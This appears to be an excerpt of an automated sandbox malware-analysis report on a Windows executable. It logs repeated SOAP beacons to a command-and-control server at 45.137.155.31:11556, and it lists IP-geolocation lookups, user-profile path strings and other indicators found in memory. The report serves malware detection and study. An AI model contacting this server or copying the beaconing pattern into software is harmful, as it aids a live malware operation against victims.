                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: Joe Sandbox ViewASN Name: VOLIA-ASUA VOLIA-ASUA
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownTCP traffic detected without corresponding DNS query: 45.137.155.31
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469171035.0000000002C62000.00000004.00000001.sdmpString found in binary or memory: http://45.137.155.31:11556
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://45.137.155.31:11556/
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://45.137.155.31:115564
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeString found in binary or memory: http://ocsp.sectigo.com0
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468837509.0000000002BC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469171035.0000000002C62000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469171035.0000000002C62000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468837509.0000000002BC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468837509.0000000002BC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468837509.0000000002BC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469143603.0000000002C5A000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469171035.0000000002C62000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469143603.0000000002C5A000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.469171035.0000000002C62000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArguments
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsResponse$
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse$
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequest
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestResponse$
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468860488.0000000002BC8000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse$
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ipify.org
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeString found in binary or memory: https://sectigo.com/CPS0D
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 1_2_0279C25C
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 1_2_0279E1D0
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 1_2_0279E1C0
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 1_2_04E44088
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 1_2_04E451C0
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 1_2_04E4E860
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_01067248
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_01067258
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_050FB448
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_050FBAB0
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_050FC571
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_050F2F60
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_050FDF78
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_050FDF88
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_05160040
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_05163AC0
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeStatic PE information: invalid certificate
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.221997766.0000000002911000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIsaacCore.dll4 vs 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
